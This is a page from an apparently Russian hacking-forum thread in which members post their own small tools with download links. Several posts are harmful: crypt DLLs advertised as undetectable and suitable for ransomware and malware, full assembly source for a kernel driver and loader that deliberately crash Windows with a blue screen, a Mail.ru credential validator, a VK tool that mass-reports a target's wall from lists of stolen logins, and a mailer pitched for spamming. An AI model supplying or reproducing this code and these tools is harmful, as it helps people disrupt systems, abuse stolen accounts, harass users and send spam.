Наши релизы

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by Jes, 15 Oct 2009.

  1. DooD

    DooD Elder - Старейшина

    Joined:
    30 Sep 2010
    Messages:
    1,168
    Likes Received:
    442
    Reputations:
    288
    Хочу представить Вам две dll-ки для крипта.
    1)Длл которая содержит три простых и в тоже время часто используемых в легкой защите алгоритма- ROR, ROL, XOR.
    Библиотека написана полностью на ассемблере.
    Вес библиотеки: 2048 байт.

    2)Библиотека с более сложным алгоритмом,некогда написанная гру3ином(CSCA1) (с)http://pblog.ru/

    Модификации которые я внес не значительны (в коде):
    1)Размер библиотеки уменьшен
    2)Полностью переписана на макро ассемблер (С фасма)
    3)Немного внес свою лепту в код
    4)Не палится НИЧЕМ, так что псевдо-хацкеры снова могут юзать ее для своих грязных дел(вспомните ситуацию когда вирус шифровал файлы и вымогал $)
    так что своего рода приват :D
    Размер также составляет 2 кб.

    Скачать dll-ки http://splashed.ucoz.ru/DLL.zip

    Как юзать:
    подгружаем длл используя LoadLibrary,получаем адрес функции GetProcAddress
    вызываем фун-ю и выгружаем длл-ку .

    [​IMG]

    [​IMG]

    [​IMG]

    [​IMG]

    на примере показано шифрование ROR .
    для XOR перед eax перед вызовом функции добавляется параметр ключа шифрования.
    то есть дописуем есчо так push 66d
    где 66d ключ шифрования.
    ключ не может быть больше 0FF/
    пример использования второй либы есть в паблике(только вместо вызова csca1 вызывайте crypt).
    Юзать можно для шифрования строк,доков...для создание мальварей, внутренней защиты строк (кракми и т.п.)и т.п.
     
    #61 DooD, 19 Jun 2011
    Last edited: 19 Jun 2011
    marynli, FALTONICK, OnlyOn and 2 others like this.
  2. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    MailRu Validator




    [​IMG]



    [Медленный]
    [Неудобный]
    [С ошибками в англ. синтаксисе]
    [Некрасивый]

    Грузите прогу, нажимаете any key и в диалоговом окне указываете файл с логинами. Прога делает свое черное дело и по его окончании рожает (в том же каталоге где и файл с логинами) два файла с соответствующими результатами.
    Если найдете ошибки в работе, просьба писать в ЛС.


    http://slil.ru/31298352 (192.5KB)
     
  3. GRRRL Power

    GRRRL Power Elder - Старейшина

    Joined:
    13 Jul 2010
    Messages:
    823
    Likes Received:
    185
    Reputations:
    84
    Зачем она нужна? в MASM32 и так имеются стандартные функции из библиотеки masm32.lib:
    PHP:
    XorData proc lpSource:DWORD,ln:DWORD,lpKey:DWORD,lnKey:DWORD
    RolData proc lpSource
    :DWORD,ln:DWORD,lpKey:DWORD,lnKey:DWORD
    RorData proc lpSource
    :DWORD,ln:DWORD,lpKey:DWORD,lnKey:DWORD
    Причем они поддерживают ключи в виде последовательности байтов.
     
    1 person likes this.
  4. DooD

    DooD Elder - Старейшина

    Joined:
    30 Sep 2010
    Messages:
    1,168
    Likes Received:
    442
    Reputations:
    288
    Ее не обязательно применять на ассемблере
     
  5. GRRRL Power

    GRRRL Power Elder - Старейшина

    Joined:
    13 Jul 2010
    Messages:
    823
    Likes Received:
    185
    Reputations:
    84
    1. Зачем переписывать было то, что уже в masm32 есть?
    2. Эти либ-файлы к студии можно прилинковать и использовать в c/c++
    3. В конце концов, сделать длл на асме, экспортирующая эти библиотечные функции, 2 минуты.
     
  6. t-s

    t-s New Member

    Joined:
    5 Mar 2011
    Messages:
    30
    Likes Received:
    4
    Reputations:
    0
    banned profile_VK

    Прочитал случайно Эту тему и стало интересно работает ли это?
    но проверить не могу - мало анкет. но может кому пригодится.


    Работает так:
    1 - вводите id человека которого хотим забанить (или его поддомен)
    2 - вставляем список анкет формата login:рassword
    3 - Жмем кнопку "Забанить"

    Программа помечает спамом верхнюю запись на стене указанного id, с разных анкет.

    [​IMG] [​IMG] [​IMG]


    ->Скачать программу 11 кб (exe не сжат UPX - ом)

    PS при использовании вводите валид, капчу я не обрабатывал.

    26.06 исправлена досадная и позорная ошибка ( если хоть один аккаунт невалиден - программа зацикливалась)
     
    #66 t-s, 25 Jun 2011
    Last edited: 28 Jun 2011
  7. DooD

    DooD Elder - Старейшина

    Joined:
    30 Sep 2010
    Messages:
    1,168
    Likes Received:
    442
    Reputations:
    288
    Решил тут немного дрова подучить, поэтому думаю кому то пригодится.
    Драйвер простенький и скорее нужен для микро-защиты,или просто поглумиться.
    В общем драйвер работает в нулевом кольце защиты(проверял только на 32-битных ХРюшах-все работает).Смысл заключается в том что бы создать крах системы,поскольку в Ring3 программно этого не сделать.
    Получается в ring0 на нуль делить нельзя,это я и воссоздал в драйвере,всего 3 ассемблерных инструкции.
    Код самого драйвера(masm)
    Code:
     
    ;@echo off
    ;goto make
    
    .386
    .model flat, stdcall
    option casemap:none
    
    include \masm32\include\w2k\ntstatus.inc
    include \masm32\include\w2k\ntddk.inc
    
    include \masm32\include\w2k\hal.inc
    
    includelib \masm32\lib\w2k\hal.lib
    
    .code
    
    DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    
    xor eax,eax
    xor ebx,ebx
    div ebx
    
    DriverEntry endp
    
    end DriverEntry
    
    :make
    
    set drv=FORCE
    
    \masm32\bin\ml /nologo /c /coff %drv%.bat
    \masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:%drv%.sys /subsystem:native %drv%.obj
    
    del %drv%.obj
    
    echo.
    pause
    
    
    
    Это как бы совмещение батника и асм,но с расширением bat.Для компиляции потребуется инклуды с ДДК.
    И сама программа использующая драйвер
    Code:
     
    .386
    .model flat, stdcall
    option casemap:none
    
    include include\windows.inc
    
    include include\kernel32.inc
    include include\user32.inc
    include include\advapi32.inc
    
    includelib lib\kernel32.lib
    includelib lib\user32.lib
    includelib lib\advapi32.lib
    
    .data
    driver db 'FORCE.sys',0
    txt1 db 'BSOD',0
    txt2 db 'BSOD!UHAHA',0
    txt3 db  'Can not register driver',0
    txt4 db  'Can not connect to Service Control Manager',0
    
    .code
    
    start proc
    
    local hSCManager:HANDLE
    local hService:HANDLE
    local acDriverPath[MAX_PATH]:CHAR
    
    
    	invoke OpenSCManager, 0, 0, SC_MANAGER_CREATE_SERVICE
    	.if eax != NULL
    		mov hSCManager, eax
    
    		push eax
    		invoke GetFullPathName,addr driver, sizeof acDriverPath, addr acDriverPath, esp
        	pop eax
    
    
    		invoke CreateService, hSCManager, addr txt1, addr txt2, \
    				SERVICE_START + DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, \
    				SERVICE_ERROR_IGNORE, addr acDriverPath, 0, 0, 0, 0, 0
    		.if eax != NULL
    			mov hService, eax
    			invoke StartService, hService, 0, 0
    			invoke DeleteService, hService
    			invoke CloseServiceHandle, hService
    		.else
    			invoke MessageBox, 0,addr txt3, 0, MB_ICONSTOP
    		.endif
    		invoke CloseServiceHandle, hSCManager
    	.else
    		invoke MessageBox, 0, addr txt4,0, MB_ICONSTOP
    	.endif
    
    	invoke ExitProcess, 0
    
    start endp
    
    end start
    
    
    
    И так что же происходит.Алгоритм использования дрова такой:
    1)Установить связь с менеджером управления сервисами и открыть его базу данных
    2)Подгрузить дров
    3)Создать объект службы и внести его в базу данных
    4)Запустить службу(тут и будет бсод)
    5)Удалить службу
    6)Закрыть хэндл.
    Что происходит внутри:Попадаем в нулевое кольцо защиты, делим на нуль (те 3 инструкции) вызываем бсод.
    можно юзать как антиотладочное средство:)
    Подробнее о точке входа в дров,и ДДК есть на wasm.ru
    размер дрова- 576 байт
    размер проги- 1586 байт
    http://splashed.ucoz.ru/FORCE.rar
    отцы сильно не пинайте,драйвера режима ядра на асме это не оч просто,поэтому старался изложить более понятно для всех.
     
    #67 DooD, 27 Jun 2011
    Last edited: 27 Jun 2011
    1 person likes this.
  8. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    почему же?
    в xp sp 3 убивал csrss и получал блу скрин.

    а вообще не одобряю. это код из первой статьи Four-F "Драйверы режима ядра". Единственное отличие - он строковые параметры передавал в ф-и сразу, а ты запихнул их в переменные.

    так же лучше не лезть в р0 без хороших знаний мат. части, иначе дальше бсода не пойдет.
     
    #68 Ins3t, 27 Jun 2011
    Last edited: 27 Jun 2011
  9. kosmo987

    kosmo987 Member

    Joined:
    28 Apr 2010
    Messages:
    0
    Likes Received:
    6
    Reputations:
    1
    sd
     
    #69 kosmo987, 27 Jun 2011
    Last edited: 24 Jan 2016
    2 people like this.
  10. DooD

    DooD Elder - Старейшина

    Joined:
    30 Sep 2010
    Messages:
    1,168
    Likes Received:
    442
    Reputations:
    288
    Ins3t да норм,просто решил немного по извращаться.Единственное что хотелось бы увидеть технику Call gate на чистом ассемблере...
     
  11. realcoder

    realcoder Member

    Joined:
    9 Dec 2010
    Messages:
    226
    Likes Received:
    11
    Reputations:
    4
    Link Manager 1.0

    программа пердназначена для храения ссылок в базе данных, интегрируется в internet explorer, имеет удобный настраиваемый интерфейс. так же может работать в фоновом режиме.

    для того чтобы установить программу:

    1. запустите инсталятор

    2. в interne explorer поставьте галочку Вид->Панели->LinkManager

    плюсы:

    + интегрируется в Internet explorer

    + надежно хранит данные, благодаря использованию технологии ADO

    + имеет простой настраиваемый интерфейс

    + может сворачиваться в трей

    + занимает мало места



    минусы:

    - отсутсвие хэлпа

    - устанавливается только на диск C:\, в связи со статичностью строки подключения(в следующей версии ожидается фикс)



    в следующей версии планируется реализовать:

    * интеграцию в opera И firefox

    * импорт из известных вэбхранилищ и избранного браузеров

    * справка

    * установка в любую директорию

    * функцию бэкапа и развертывания бд при переустановке windows



    в архиве вы найдете:

    * исходники на delphi

    * установщик, созданный через inno setup

    * компоненты vcl, необходимые для компиляции



    в программе использованны исходники proxybar для интеграции в internet explorer
    скачиваем здесь http://vvova15.ucoz.com/load/programmirovanie_na_delphi_7/kachaem_moj_novyj_reliz_linkmanager_v1_0/2-1-0-27
    скрнины:
    [​IMG]
     
    #71 realcoder, 27 Jun 2011
    Last edited by a moderator: 28 Jun 2011
  12. enigma

    enigma Member

    Joined:
    10 Jul 2011
    Messages:
    80
    Likes Received:
    15
    Reputations:
    7
    Send_to Graffiti

    Программа предназначена для загрузки граффити на стенки друзей.


    1 - Ложим программу в папку SendTo
    2 - Называем ее например "Отправить на стену другу"
    3 - Жмем правой кнопкой мыши по картинке, в меню "Отправить" выбираем - Отправить на стену другу.

    При первом запуске необходимо будет ввести логин и пароль
    Эти данные запишутся в реестр. (не зашифрованные)
    Если данные верны, окошко больше не будет показываться.

    Ну и скриншоты:

    [​IMG]
    [​IMG] [​IMG]

    Довольно удобно.

    Минусы - пока нет обработки капчи (добавлю)
    Ну и по дизайну, иконки нет и тп.
    а так - пользовался пока без проблем. (windows 7)
    Может кому полезно будет.

    Яп C++ WinApi

    Скачать 79 кб
     
    1 person likes this.
  13. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    enigma, Антирвирус Евгения материться. Говорит трой.
     
  14. enigma

    enigma Member

    Joined:
    10 Jul 2011
    Messages:
    80
    Likes Received:
    15
    Reputations:
    7
    shadowrun даже не знаю...я щас сюда залил для проверки http://www.kaspersky.ru/scanforvirus -
    Само exe ниче не накрыто, не сжато и тд. так что не знаю почему у тебя ругается.
    может из за работы с реестром..
    сайт virustotal что то не грузится попозже на нем проверю.
     
  15. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    2enigma
    Сори, все норм с файлом. На флехе вирятина была. Забыл отписаться.
     
  16. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Mail Sender

    [​IMG]

    Прога для рассылки маил сообщений по протоколу SMTP.
    Лучше спамить бурж ящики ибо с поддержкой русских кодировок траблы. Если будет время - исправлю. Найденные баги, недочеты и пожелания пишите в лс.
    http://www.sendspace.com/file/a90eds
     
  17. Smapt

    Smapt Elder - Старейшина

    Joined:
    29 Jan 2008
    Messages:
    31
    Likes Received:
    32
    Reputations:
    3
    Base`ter

    Base`ter
    Програмка для работы со словарями​

    Возможности:

    [#] Сортировка.
    [#] Удаление дубликатов.
    [#] Разбиение файла на части по кол-ву строк.
    [#] Работа с фалом идет в отдельном потоке, что позволяет избежать "подвисаний" интерфейса, наблюдаемых в аналогичных программах.


    [​IMG]

    По поводу доработки или багов в ЛС.


    http://depositfiles.com/files/jvkcc1j8f
     
    1 person likes this.
  18. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    Battery Alert
    Сегодня в очередной раз ноутбук тихо разрядился и перешел в спящий режим. За последнюю неделю это наверное уже раз в 20. Отошел в другую комнату, а он зараза вырубился =(
    Решил написать небольшую прожку которая будет «сигнализировать» когда заряд батареи опуститься ниже заданного процента, чтобы я из другой комнаты мог услышать. Возможно такое уже написали, но мельком проглянул гугл, то ничего не нашел (а вот на форумах люди искали такую).

    [​IMG]

    Функционал очень простой, вводите нижнюю границу зарядки и сколько раз повторить сигнал (рядом с exeшником alert.mp3) и все. При запуске сразу сворачивается в трей, удобно при добавлении в автозапуск. Когда доходит зарядка до заданного минимума выскакивает окно, при закрытии которого сигнал останавливается.

    [​IMG]

    Надеюсь, кому-то пригодится :)

    Скачать
     
    1 person likes this.
  19. seosimf

    seosimf Member

    Joined:
    3 Mar 2011
    Messages:
    271
    Likes Received:
    44
    Reputations:
    6
    2zifanchuck Сизифов труд:
    [​IMG]
     
  20. zifanchuck

    zifanchuck Elder - Старейшина

    Joined:
    27 Oct 2008
    Messages:
    396
    Likes Received:
    154
    Reputations:
    3
    2seosimf, у меня 7ка, смотрел, есть там "Уведомление о низком заряде", но там звук типа "пик"и все, с другой комнаты не услышишь...
    + практика не бывает лишней =)

    :(
     
    #80 zifanchuck, 30 Jul 2011
    Last edited: 30 Jul 2011